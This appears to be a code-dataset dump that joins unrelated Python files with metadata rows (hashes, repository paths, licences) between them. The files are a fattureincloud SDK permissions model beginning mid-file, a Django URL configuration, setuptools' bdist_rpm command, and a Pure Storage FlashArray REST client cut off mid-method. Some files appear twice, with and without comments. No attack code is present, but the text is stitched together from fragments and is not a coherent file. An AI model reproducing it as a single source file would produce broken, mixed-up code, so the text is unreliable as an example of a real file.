from fattureincloud_python_sdk.model.permissions_fic_issued_documents_detailed import PermissionsFicIssuedDocumentsDetailed
globals()['PermissionLevel'] = PermissionLevel
globals()['PermissionsFicIssuedDocumentsDetailed'] = PermissionsFicIssuedDocumentsDetailed
class Permissions(ModelNormal):
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,)
_nullable = True
@cached_property
def openapi_types():
lazy_import()
return {
'fic_situation': (PermissionLevel,),
'fic_clients': (PermissionLevel,),
'fic_suppliers': (PermissionLevel,),
'fic_products': (PermissionLevel,),
'fic_issued_documents': (PermissionLevel,),
'fic_received_documents': (PermissionLevel,),
'fic_receipts': (PermissionLevel,),
'fic_calendar': (PermissionLevel,),
'fic_archive': (PermissionLevel,),
'fic_taxes': (PermissionLevel,),
'fic_stock': (PermissionLevel,),
'fic_cashbook': (PermissionLevel,),
'fic_settings': (PermissionLevel,),
'fic_emails': (PermissionLevel,),
'fic_export': (PermissionLevel,),
'fic_import_bankstatements': (PermissionLevel,),
'fic_import_clients_suppliers': (PermissionLevel,),
'fic_import_issued_documents': (PermissionLevel,),
'fic_import_products': (PermissionLevel,),
'fic_recurring': (PermissionLevel,),
'fic_riba': (PermissionLevel,),
'dic_employees': (PermissionLevel,),
'dic_settings': (PermissionLevel,),
'dic_timesheet': (PermissionLevel,),
'fic_issued_documents_detailed': (PermissionsFicIssuedDocumentsDetailed,),
}
@cached_property
def discriminator():
return None
attribute_map = {
'fic_situation': 'fic_situation',
'fic_clients': 'fic_clients',
'fic_suppliers': 'fic_suppliers',
'fic_products': 'fic_products',
'fic_issued_documents': 'fic_issued_documents',
'fic_received_documents': 'fic_received_documents',
'fic_receipts': 'fic_receipts',
'fic_calendar': 'fic_calendar',
'fic_archive': 'fic_archive',
'fic_taxes': 'fic_taxes',
'fic_stock': 'fic_stock',
'fic_cashbook': 'fic_cashbook',
'fic_settings': 'fic_settings',
'fic_emails': 'fic_emails',
'fic_export': 'fic_export',
'fic_import_bankstatements': 'fic_import_bankstatements',
'fic_import_clients_suppliers': 'fic_import_clients_suppliers',
'fic_import_issued_documents': 'fic_import_issued_documents',
'fic_import_products': 'fic_import_products',
'fic_recurring': 'fic_recurring',
'fic_riba': 'fic_riba',
'dic_employees': 'dic_employees',
'dic_settings': 'dic_settings',
'dic_timesheet': 'dic_timesheet',
'fic_issued_documents_detailed': 'fic_issued_documents_detailed',
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| true | true |
f7325bdb93b55decc83345de041763385b298627 | 847 | py | Python | arboretum_project/arboretum_project/urls.py | m-libbrecht/django-arboretum | 11b97254ed9885b03d25d99188157c3f79a14a4f | [
"MIT"
] | null | null | null | arboretum_project/arboretum_project/urls.py | m-libbrecht/django-arboretum | 11b97254ed9885b03d25d99188157c3f79a14a4f | [
"MIT"
] | null | null | null | arboretum_project/arboretum_project/urls.py | m-libbrecht/django-arboretum | 11b97254ed9885b03d25d99188157c3f79a14a4f | [
"MIT"
] | null | null | null | """arboretum URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from demoapp.views import TreeView
# URL routing table: the site root renders the demo tree view, and the
# standard Django admin is mounted under /admin/.
urlpatterns = [
    url(r'^$', TreeView.as_view(), name='home'),
    url(r'^admin/', include(admin.site.urls)),
]
| 30.25 | 77 | 0.700118 |
from django.conf.urls import include, url
from django.contrib import admin
from demoapp.views import TreeView
urlpatterns = [
url(r'^$', TreeView.as_view(), name='home'),
url(r'^admin/', include(admin.site.urls)),
]
| true | true |
f7325c79a928bd9ff8953a9a81a3e2e12fa93031 | 855 | py | Python | python3-virtualenv/lib/python3.8/site-packages/setuptools/command/bdist_rpm.py | bbalkaransingh23888/OrientationHack | 7eae6cce1226112c000ea8a175f6dc5a82ee0ac2 | [
"MIT"
] | null | null | null | python3-virtualenv/lib/python3.8/site-packages/setuptools/command/bdist_rpm.py | bbalkaransingh23888/OrientationHack | 7eae6cce1226112c000ea8a175f6dc5a82ee0ac2 | [
"MIT"
] | null | null | null | python3-virtualenv/lib/python3.8/site-packages/setuptools/command/bdist_rpm.py | bbalkaransingh23888/OrientationHack | 7eae6cce1226112c000ea8a175f6dc5a82ee0ac2 | [
"MIT"
] | null | null | null | import distutils.command.bdist_rpm as orig
class bdist_rpm(orig.bdist_rpm):
    """
    setuptools-flavoured ``bdist_rpm``.

    Differences from the stock distutils implementation:

    1. ``egg_info`` runs first so the distribution name and version are
       freshly computed before RPM metadata is generated.
    2. The generated spec file installs with
       ``--single-version-externally-managed`` (disabling eggs in RPM
       distributions) and points ``%setup`` at the unmangled source
       directory.
    """

    def run(self):
        # Refresh name/version metadata before delegating to distutils.
        self.run_command("egg_info")
        orig.bdist_rpm.run(self)

    def _make_spec_file(self):
        def _adjust(line):
            # Disable egg installation and fix the %setup directory name.
            line = line.replace(
                "setup.py install ",
                "setup.py install --single-version-externally-managed ",
            )
            return line.replace("%setup", "%setup -n %{name}-%{unmangled_version}")

        return [_adjust(line) for line in orig.bdist_rpm._make_spec_file(self)]
| 29.482759 | 75 | 0.617544 | import distutils.command.bdist_rpm as orig
class bdist_rpm(orig.bdist_rpm):
def run(self):
self.run_command("egg_info")
orig.bdist_rpm.run(self)
def _make_spec_file(self):
spec = orig.bdist_rpm._make_spec_file(self)
spec = [
line.replace(
"setup.py install ",
"setup.py install --single-version-externally-managed ",
).replace("%setup", "%setup -n %{name}-%{unmangled_version}")
for line in spec
]
return spec
| true | true |
f7325c9bd6d6204726d8f2c239e94b0f13af7be3 | 83,032 | py | Python | purestorage/purestorage.py | kjetijor/rest-client | 43934a78e95e9719584a66189e4c4851eeb9ebaf | [
"BSD-2-Clause"
] | null | null | null | purestorage/purestorage.py | kjetijor/rest-client | 43934a78e95e9719584a66189e4c4851eeb9ebaf | [
"BSD-2-Clause"
] | null | null | null | purestorage/purestorage.py | kjetijor/rest-client | 43934a78e95e9719584a66189e4c4851eeb9ebaf | [
"BSD-2-Clause"
] | null | null | null | """
This library provides an easy way to script administration tasks for the
Pure Storage FlashArray.
When passing arguments to methods that take \*\*kwargs, the exact
parameters that can be passed can be found in the REST API guide for the
given release of Purity running on the FlashArray.
"""
import json
import requests
from distutils.version import LooseVersion
# The current version of this library.
VERSION = "1.11.3"
class FlashArray(object):
"""Represents a Pure Storage FlashArray and exposes administrative APIs.
:param target: IP address or domain name of the target array's management
interface.
:type target: str
:param username: Username of the user with which to log in.
:type username: str, optional
:param password: Password of the user with which to log in.
:type password: str, optional
:param api_token: API token of the user with which to log in.
:type api_token: str, optional
:param rest_version: REST API version to use when communicating with
target array.
:type rest_version: str, optional
:param verify_https: Enable SSL certificate verification for HTTPS requests.
:type verify_https: bool, optional
:param ssl_cert: Path to SSL certificate or CA Bundle file. Ignored if
verify_https=False.
:type ssl_cert: str, optional
:param user_agent: String to be used as the HTTP User-Agent for requests.
:type user_agent: str, optional
:raises: :class:`PureError`
- If the target array cannot be found.
- If the target array does not support any of the REST versions used by
this library.
- If the username and password or api_token are invalid.
:raises: :class:`ValueError`
- If no api_token or username and password are specified.
- If an api_token and a username or password are specified.
- If the specified rest_version is not supported by this library or by
the target array.
.. note::
The FlashArray constructor requires either a username and password or
an api_token but not both.
.. note::
If a rest_version is not specified, the FlashArray object uses the
highest REST API version supported by both the target array and this
library. If the REST API version should become deprecated during the
lifetime of the FlashArray object, the object renegotiates a REST
version to use and continues running.
.. note::
If a rest_version is specified, that version is used so long as it is
supported by both the target array and this library. In this case, the
FlashArray object does not attempt to renegotiate the REST API version.
"""
supported_rest_versions = [
"1.11",
"1.10",
"1.9",
"1.8",
"1.7",
"1.6",
"1.5",
"1.4",
"1.3",
"1.2",
"1.1",
"1.0",
]
def __init__(self, target, username=None, password=None, api_token=None,
             rest_version=None, verify_https=False, ssl_cert=None,
             user_agent=None):
    """Create a FlashArray client and open a REST session.

    Exactly one form of credentials must be given: either api_token, or
    both username and password; anything else raises ValueError.
    If rest_version is omitted, the newest version supported by both the
    array and this library is negotiated (and renegotiated on demand).
    """
    has_password_auth = bool(username and password)
    if not api_token and not has_password_auth:
        raise ValueError(
            "Must specify API token or both username and password.")
    elif api_token and (username or password):
        raise ValueError(
            "Specify only API token or both username and password.")
    self._cookies = {}
    self._target = target
    # Renegotiate on HTTP 450 only when the caller did not pin a version.
    self._renegotiate_rest_version = not rest_version
    self._verify_https = verify_https
    self._ssl_cert = ssl_cert
    self._user_agent = user_agent
    self._rest_version = rest_version
    if self._rest_version:
        self._rest_version = self._check_rest_version(self._rest_version)
    else:
        self._rest_version = self._choose_rest_version()
    self._api_token = api_token or self._obtain_api_token(username, password)
    self._start_session()
def _request(self, method, path, data=None, reestablish_session=True):
    """Perform an HTTP request against the array's REST API.

    :param method: HTTP method ("GET", "POST", "PUT", "DELETE").
    :param path: Request path relative to /api/<version>/, or a full
        "https://" URL which is used verbatim.
    :param data: JSON-serializable request body (may be None).
    :param reestablish_session: When True, a 401 response triggers one
        attempt to re-authenticate and retry the request.
    :returns: Parsed JSON body as a ResponseList or ResponseDict with the
        response headers attached.
    :raises PureError: If the request cannot be sent or the response is
        not JSON.
    :raises PureHTTPError: If the array returns an error status code.
    """
    if path.startswith("https://"):
        url = path  # For cases where URL of different form is needed.
    else:
        url = "https://{0}/api/{1}/{2}".format(
            self._target, self._rest_version, path)
    headers = {"Content-Type": "application/json"}
    if self._user_agent:
        headers['User-Agent'] = self._user_agent
    body = json.dumps(data).encode("utf-8")
    # SSL verification: off by default; a CA bundle path takes precedence.
    verify = False
    if self._verify_https:
        if self._ssl_cert:
            verify = self._ssl_cert
        else:
            verify = True
    try:
        response = requests.request(method, url, data=body, headers=headers,
                                    cookies=self._cookies, verify=verify)
    except requests.exceptions.RequestException as err:
        # Error outside the scope of HTTP status codes, e.g. unable to
        # resolve the domain name. BUGFIX: exceptions have no `.message`
        # attribute on Python 3; str(err) works on both Python 2 and 3.
        raise PureError(str(err))
    if response.status_code == 200:
        if "application/json" in response.headers.get("Content-Type", ""):
            if response.cookies:
                self._cookies.update(response.cookies)
            else:
                self._cookies.clear()
            content = response.json()
            if isinstance(content, list):
                content = ResponseList(content)
            elif isinstance(content, dict):
                content = ResponseDict(content)
            content.headers = response.headers
            return content
        raise PureError("Response not in JSON: " + response.text)
    elif response.status_code == 401 and reestablish_session:
        # Session cookie expired; log in again and retry exactly once.
        self._start_session()
        return self._request(method, path, data, False)
    elif response.status_code == 450 and self._renegotiate_rest_version:
        # Purity REST API version is incompatible.
        old_version = self._rest_version
        self._rest_version = self._choose_rest_version()
        if old_version == self._rest_version:
            # Got 450 error, but the rest version was supported
            # Something really unexpected happened.
            raise PureHTTPError(self._target, str(self._rest_version), response)
        return self._request(method, path, data, reestablish_session)
    else:
        raise PureHTTPError(self._target, str(self._rest_version), response)
#
# REST API session management methods
#
def _check_rest_version(self, version):
    """Validate that both this library and the target array accept a
    REST API version, and return it as a LooseVersion.

    :raises ValueError: If either side does not support the version.
    """
    version = str(version)
    if version not in self.supported_rest_versions:
        raise ValueError(
            "Library is incompatible with REST API version {0}".format(version))
    if version not in self._list_available_rest_versions():
        raise ValueError(
            "Array is incompatible with REST API version {0}".format(version))
    return LooseVersion(version)
def _choose_rest_version(self):
    """Return the newest REST API version supported by both the target
    array and this library.

    :returns: The chosen version as a LooseVersion.
    :raises PureError: If the two sides have no version in common.
    """
    versions = self._list_available_rest_versions()
    versions = [LooseVersion(x) for x in versions
                if x in self.supported_rest_versions]
    if versions:
        return max(versions)
    # BUGFIX: the original adjacent literals concatenated to
    # "...supportedby the target array." -- a space was missing.
    raise PureError(
        "Library is incompatible with all REST API versions supported "
        "by the target array.")
def _list_available_rest_versions(self):
    """Return the list of REST API versions the array itself supports."""
    url = "https://%s/api/api_version" % self._target
    response = self._request("GET", url, reestablish_session=False)
    return response["version"]
def _obtain_api_token(self, username, password):
    """Exchange a username and password for an API token."""
    credentials = {"username": username, "password": password}
    response = self._request("POST", "auth/apitoken", credentials,
                             reestablish_session=False)
    return response["api_token"]
def _start_session(self):
    """Open a REST API session using the stored API token."""
    payload = {"api_token": self._api_token}
    self._request("POST", "auth/session", payload,
                  reestablish_session=False)
def get_rest_version(self):
"""Get the REST API version being used by this object.
:returns: The REST API version.
:rtype: str
"""
return str(self._rest_version)
def invalidate_cookie(self):
    """End the REST API session by invalidating its session cookie.

    .. note::
        Any later call creates a fresh cookie; invoke this only when the
        FlashArray object is no longer needed.
    """
    self._request("DELETE", "auth/session")
#
# Array management methods
#
def _set_console_lock(self, **kwargs):
    """PUT array/console_lock with the given attributes."""
    response = self._request("PUT", "array/console_lock", kwargs)
    return response
def enable_console_lock(self):
    """Enable root lockout from the array at the physical console.

    :returns: A dictionary mapping "console_lock" to "enabled".
    :rtype: ResponseDict
    """
    return self._set_console_lock(enabled=True)
def disable_console_lock(self):
    """Disable root lockout from the array at the physical console.

    :returns: A dictionary mapping "console_lock" to "disabled".
    :rtype: ResponseDict
    """
    return self._set_console_lock(enabled=False)
def get(self, **kwargs):
    """Get array attributes (see **GET array** in the REST API Guide).

    :returns: A dictionary describing the array, or a list of
        dictionaries when multiple attributes are requested.
    :rtype: ResponseDict or ResponseList
    """
    return self._request("GET", "array", kwargs)
def get_console_lock_status(self):
    """Report whether console lock is enabled on the array.

    :returns: A dictionary mapping "console_lock" to "enabled" or
        "disabled".
    :rtype: ResponseDict
    """
    return self._request("GET", "array/console_lock")
def rename(self, name):
    """Give the array a new name.

    :param name: The new name for the array.
    :type name: str
    :returns: A dictionary mapping "array_name" to name.
    :rtype: ResponseDict
    """
    return self.set(name=name)
def set(self, **kwargs):
    """Set array attributes (see **PUT array** in the REST API Guide).

    :returns: A dictionary mapping each changed parameter to its new
        value.
    :rtype: ResponseDict
    """
    return self._request("PUT", "array", kwargs)
#
# Volume and snapshot management methods
#
def _set_volume(self, volume, **kwargs):
    """PUT volume/:volume with the given attributes and return the
    resulting description of the volume."""
    endpoint = "volume/%s" % volume
    return self._request("PUT", endpoint, kwargs)
def create_snapshot(self, volume, **kwargs):
    """Take a snapshot of a single volume.

    :param volume: Name of the volume to snapshot.
    :type volume: str
    :returns: A dictionary describing the new snapshot.
    :rtype: ResponseDict
    """
    # Delegate to the bulk call and unwrap the single result.
    return self.create_snapshots([volume], **kwargs)[0]
def create_snapshots(self, volumes, **kwargs):
    """Take snapshots of the listed volumes.

    :param volumes: Names of the volumes to snapshot.
    :type volumes: list of str
    :returns: A list of dictionaries describing the new snapshots.
    :rtype: ResponseDict
    """
    payload = dict(source=volumes, snap=True)
    payload.update(kwargs)
    return self._request("POST", "volume", payload)
def create_volume(self, volume, size):
    """Create a volume of the given size.

    :param volume: Name of the volume to be created.
    :type volume: str
    :param size: Size in bytes (int, multiple of 512) or a string of an
        integer plus a suffix: S(2^9), K(2^10), M(2^20), G(2^30),
        T(2^40), P(2^50). Maximum supported size is 4 petabytes.
    :type size: int or str
    :returns: A dictionary describing the created volume.
    :rtype: ResponseDict
    """
    endpoint = "volume/%s" % volume
    return self._request("POST", endpoint, {"size": size})
def copy_volume(self, source, dest, **kwargs):
    """Clone one volume onto another name.

    :param source: Name of the source volume.
    :type source: str
    :param dest: Name of the destination volume.
    :type dest: str
    :returns: A dictionary describing the destination volume.
    :rtype: ResponseDict
    """
    payload = dict(source=source)
    payload.update(kwargs)
    return self._request("POST", "volume/%s" % dest, payload)
def destroy_volume(self, volume):
    """Destroy an existing volume or snapshot.

    :param volume: Name of the volume to be destroyed.
    :type volume: str
    :returns: A dictionary mapping "name" to volume.
    :rtype: ResponseDict

    .. warnings also::
        Potentially destructive: the volume is recoverable for 24 hours
        after destruction unless it is eradicated first.
    """
    return self._request("DELETE", "volume/%s" % volume)
def eradicate_volume(self, volume):
    """Permanently erase a destroyed volume or snapshot.

    :param volume: Name of the volume to be eradicated.
    :type volume: str
    :returns: A dictionary mapping "name" to volume.
    :rtype: ResponseDict

    .. note::
        Fails unless the volume has already been destroyed.
    .. warnings also::
        Irreversible: the data cannot be recovered afterwards.
    """
    return self._request("DELETE", "volume/%s" % volume,
                         {"eradicate": True})
def extend_volume(self, volume, size):
    """Grow a volume to a new, strictly larger size.

    :param volume: Name of the volume to be extended.
    :type volume: str
    :param size: New size in bytes (int, multiple of 512) or a string of
        an integer plus a suffix: S(2^9), K(2^10), M(2^20), G(2^30),
        T(2^40), P(2^50). Maximum supported size is 4 petabytes.
    :type size: int or str
    :returns: A dictionary mapping "name" to volume and "size" to the
        volume's new size in bytes.
    :rtype: ResponseDict
    """
    # truncate=False makes the array reject any attempt to shrink.
    return self._set_volume(volume, size=size, truncate=False)
def get_volume(self, volume, **kwargs):
    """Describe a volume or snapshot.

    :param volume: Name of the volume to get information about.
    :type volume: str
    :returns: A dictionary describing the volume, or a list describing
        its snapshots when snap=True is passed.
    :rtype: ResponseDict or ResponseList
    """
    return self._request("GET", "volume/%s" % volume, kwargs)
def add_volume(self, volume, pgroup):
    """Add a volume to a protection group.

    :param volume: Name of the volume to add to pgroup.
    :type volume: str
    :param pgroup: pgroup to which to add volume.
    :type pgroup: str
    :returns: A dictionary mapping "name" to volume and
        "protection_group" to pgroup.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.7 or later.
    """
    endpoint = "volume/%s/pgroup/%s" % (volume, pgroup)
    return self._request("POST", endpoint)
def remove_volume(self, volume, pgroup):
    """Remove a volume from a protection group.

    :param volume: Name of the volume to remove from pgroup.
    :type volume: str
    :param pgroup: pgroup from which to remove volume.
    :type pgroup: str
    :returns: A dictionary mapping "name" to volume and
        "protection_group" to pgroup.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.7 or later.
    """
    endpoint = "volume/%s/pgroup/%s" % (volume, pgroup)
    return self._request("DELETE", endpoint)
def list_volume_block_differences(self, volume, **kwargs):
    """List block differences between a volume and its base volume.

    :param volume: Name of the volume to get information about.
    :type volume: str
    :returns: A list of dictionaries describing the block differences.
    :rtype: ResponseList

    .. note::
        Requires use of REST API 1.3 or later.
    """
    return self._request("GET", "volume/%s/diff" % volume, kwargs)
def list_volume_private_connections(self, volume, **kwargs):
    """List hosts privately connected to a volume.

    :param volume: Name of the volume whose private connections to list.
    :type volume: str
    :returns: A list of dictionaries describing the private connections.
    :rtype: ResponseList
    """
    return self._request("GET", "volume/%s/host" % volume, kwargs)
def list_volume_shared_connections(self, volume, **kwargs):
    """List host groups connected to a volume.

    :param volume: Name of the volume whose shared connections to list.
    :type volume: str
    :returns: A list of dictionaries describing the shared connections.
    :rtype: ResponseList
    """
    return self._request("GET", "volume/%s/hgroup" % volume, kwargs)
def list_volumes(self, **kwargs):
    """List volumes (see **GET volume** in the REST API Guide).

    :returns: A list of dictionaries, one per volume.
    :rtype: ResponseList
    """
    return self._request("GET", "volume", kwargs)
def rename_volume(self, volume, name):
    """Give a volume a new name.

    :param volume: Current name of the volume.
    :type volume: str
    :param name: New name for the volume.
    :type name: str
    :returns: A dictionary mapping "name" to name.
    :rtype: ResponseDict

    .. note::
        Snapshots of the volume are renamed along with it, keeping
        their previous suffixes.
    """
    return self._set_volume(volume, name=name)
def recover_volume(self, volume):
    """Recover a destroyed (but not yet eradicated) volume.

    :param volume: Name of volume to be recovered.
    :type volume: str
    :returns: A dictionary mapping "name" to volume.
    :rtype: ResponseDict

    .. note::
        Must happen within 24 hours of destruction, after which the
        volume is eradicated.
    """
    return self._set_volume(volume, action="recover")
def truncate_volume(self, volume, size):
    """Shrink a volume to a new, smaller size.

    :param volume: Name of the volume to truncate.
    :type volume: str
    :param size: New size in bytes, or a string with a size suffix.
    :type size: int or str
    :returns: A dictionary mapping "name" to volume and "size" to the
        volume's new size in bytes.
    :rtype: ResponseDict

    .. warnings also::
        Data may be irretrievably lost. A snapshot of the prior state
        is taken and immediately destroyed, but remains recoverable for
        24 hours after the truncation.
    """
    # truncate=True authorizes the array to shrink the volume.
    return self._set_volume(volume, size=size, truncate=True)
#
# Host management methods
#
def connect_host(self, host, volume, **kwargs):
    """Connect a host to a volume.

    :param host: Name of host to connect to volume.
    :type host: str
    :param volume: Name of volume to connect to host.
    :type volume: str
    :returns: A dictionary describing the host/volume connection.
    :rtype: ResponseDict
    """
    endpoint = "host/%s/volume/%s" % (host, volume)
    return self._request("POST", endpoint, kwargs)
def create_host(self, host, **kwargs):
    """Create a host and return a dictionary describing it.

    :param host: Name of host to be created.
    :type host: str
    :returns: A dictionary describing the created host.
    :rtype: ResponseDict
    """
    return self._request("POST", "host/%s" % host, kwargs)
def delete_host(self, host):
    """Delete a host.

    :param host: Name of host to be deleted.
    :type host: str
    :returns: A dictionary mapping "name" to host.
    :rtype: ResponseDict
    """
    return self._request("DELETE", "host/%s" % host)
def disconnect_host(self, host, volume):
    """Break the connection between a host and a volume.

    :param host: Name of host to be disconnected from volume.
    :type host: str
    :param volume: Name of volume to be disconnected from host.
    :type volume: str
    :returns: A dictionary mapping "name" to host and "vol" to volume.
    :rtype: ResponseDict
    """
    endpoint = "host/%s/volume/%s" % (host, volume)
    return self._request("DELETE", endpoint)
def get_host(self, host, **kwargs):
    """Describe a host.

    :param host: Name of host to get information about.
    :type host: str
    :returns: A dictionary describing host.
    :rtype: ResponseDict
    """
    return self._request("GET", "host/%s" % host, kwargs)
def add_host(self, host, pgroup):
    """Add a host to a protection group.

    :param host: Name of the host to add to pgroup.
    :type host: str
    :param pgroup: pgroup to which to add host.
    :type pgroup: str
    :returns: A dictionary mapping "name" to host and
        "protection_group" to pgroup.
    :rtype: ResponseDict
    """
    endpoint = "host/%s/pgroup/%s" % (host, pgroup)
    return self._request("POST", endpoint)
def remove_host(self, host, pgroup):
    """Remove a host from a protection group.

    :param host: Name of the host to remove from pgroup.
    :type host: str
    :param pgroup: pgroup from which to remove host.
    :type pgroup: str
    :returns: A dictionary mapping "name" to host and
        "protection_group" to pgroup.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.7 or later.
    """
    endpoint = "host/%s/pgroup/%s" % (host, pgroup)
    return self._request("DELETE", endpoint)
def list_host_connections(self, host, **kwargs):
    """List volumes connected to a host.

    :param host: Name of host for which to list connections.
    :type host: str
    :returns: A list of dictionaries describing host's connections.
    :rtype: ResponseList
    """
    return self._request("GET", "host/%s/volume" % host, kwargs)
def list_hosts(self, **kwargs):
    """List hosts (see **GET host** in the REST API Guide).

    :returns: A list of dictionaries, one per host.
    :rtype: ResponseList
    """
    return self._request("GET", "host", kwargs)
def rename_host(self, host, name):
    """Give a host a new name.

    :param host: Current name of the host.
    :type host: str
    :param name: New name for the host.
    :type name: str
    :returns: A dictionary mapping "name" to name.
    :rtype: ResponseDict
    """
    return self.set_host(host, name=name)
def set_host(self, host, **kwargs):
    """Set attributes of a host (see **PUT host/:host**).

    :param host: Name of host for which to set attribute.
    :type host: str
    :returns: A dictionary describing host.
    :rtype: ResponseDict
    """
    return self._request("PUT", "host/%s" % host, kwargs)
#
# Host group management methods
#
def connect_hgroup(self, hgroup, volume, **kwargs):
    """Create a shared connection between a host group and a volume.

    :param hgroup: Name of hgroup to connect to volume.
    :type hgroup: str
    :param volume: Name of volume to connect to hgroup.
    :type volume: str
    :returns: A dictionary describing the hgroup/volume connection.
    :rtype: ResponseDict
    """
    endpoint = "hgroup/%s/volume/%s" % (hgroup, volume)
    return self._request("POST", endpoint, kwargs)
def create_hgroup(self, hgroup, **kwargs):
    """Create a host group and return a dictionary describing it.

    :param hgroup: Name of hgroup to be created.
    :type hgroup: str
    :returns: A dictionary describing the created hgroup.
    :rtype: ResponseDict
    """
    return self._request("POST", "hgroup/%s" % hgroup, kwargs)
def delete_hgroup(self, hgroup):
    """Delete a host group.

    :param hgroup: Name of the hgroup to be deleted.
    :type hgroup: str
    :returns: A dictionary mapping "name" to hgroup.
    :rtype: ResponseDict
    """
    return self._request("DELETE", "hgroup/%s" % hgroup)
def disconnect_hgroup(self, hgroup, volume):
    """Break a shared connection between a host group and a volume.

    :param hgroup: Name of hgroup to be disconnected from volume.
    :type hgroup: str
    :param volume: Name of volume to be disconnected from hgroup.
    :type volume: str
    :returns: A dictionary mapping "name" to hgroup and "vol" to volume.
    :rtype: ResponseDict
    """
    endpoint = "hgroup/%s/volume/%s" % (hgroup, volume)
    return self._request("DELETE", endpoint)
def get_hgroup(self, hgroup, **kwargs):
    """Describe a host group.

    :param hgroup: Name of hgroup to get information about.
    :type hgroup: str
    :returns: A dictionary describing hgroup.
    :rtype: ResponseDict
    """
    return self._request("GET", "hgroup/%s" % hgroup, kwargs)
def add_hgroup(self, hgroup, pgroup):
    """Add a host group to a protection group.

    :param hgroup: Name of the hgroup to add to pgroup.
    :type hgroup: str
    :param pgroup: pgroup to which to add hgroup.
    :type pgroup: str
    :returns: A dictionary mapping "name" to hgroup and
        "protection_group" to pgroup.
    :rtype: ResponseDict
    """
    endpoint = "hgroup/%s/pgroup/%s" % (hgroup, pgroup)
    return self._request("POST", endpoint)
def remove_hgroup(self, hgroup, pgroup):
    """Remove a host group from a protection group.

    :param hgroup: Name of the hgroup to remove from pgroup.
    :type hgroup: str
    :param pgroup: pgroup from which to remove hgroup.
    :type pgroup: str
    :returns: A dictionary mapping "name" to hgroup and
        "protection_group" to pgroup.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.7 or later.
    """
    endpoint = "hgroup/%s/pgroup/%s" % (hgroup, pgroup)
    return self._request("DELETE", endpoint)
def list_hgroup_connections(self, hgroup):
    """List volumes shared-connected to a host group.

    :param hgroup: Name of hgroup for which to list connections.
    :type hgroup: str
    :returns: A list of dictionaries describing hgroup's connections.
    :rtype: ResponseList
    """
    return self._request("GET", "hgroup/%s/volume" % hgroup)
def list_hgroups(self, **kwargs):
    """List host groups (see **GET hgroup** in the REST API Guide).

    :returns: A list of dictionaries, one per hgroup.
    :rtype: ResponseList
    """
    return self._request("GET", "hgroup", kwargs)
def rename_hgroup(self, hgroup, name):
    """Give a host group a new name.

    :param hgroup: Current name of the hgroup.
    :type hgroup: str
    :param name: New name for the hgroup.
    :type name: str
    :returns: A dictionary mapping "name" to name.
    :rtype: ResponseDict
    """
    return self.set_hgroup(hgroup, name=name)
def set_hgroup(self, hgroup, **kwargs):
    """Set attributes of a host group (see **PUT hgroup/:hgroup**).

    :param hgroup: Name of hgroup for which to set attribute.
    :type hgroup: str
    :returns: A dictionary describing hgroup.
    :rtype: ResponseDict
    """
    return self._request("PUT", "hgroup/%s" % hgroup, kwargs)
#
# Network management methods
#
def disable_network_interface(self, interface):
    """Disable a network interface.

    :param interface: Name of network interface to be disabled.
    :type interface: str
    :returns: A dictionary describing the interface.
    :rtype: ResponseDict
    """
    return self.set_network_interface(interface, enabled=False)
def enable_network_interface(self, interface):
    """Enable a network interface.

    :param interface: Name of network interface to be enabled.
    :type interface: str
    :returns: A dictionary describing the interface.
    :rtype: ResponseDict
    """
    return self.set_network_interface(interface, enabled=True)
def get_network_interface(self, interface):
    """Describe a network interface.

    :param interface: Name of network interface to get information about.
    :type interface: str
    :returns: A dictionary describing the interface.
    :rtype: ResponseDict
    """
    return self._request("GET", "network/%s" % interface)
def list_network_interfaces(self):
    """List the array's network interfaces.

    :returns: A list of dictionaries, one per network interface.
    :rtype: ResponseList
    """
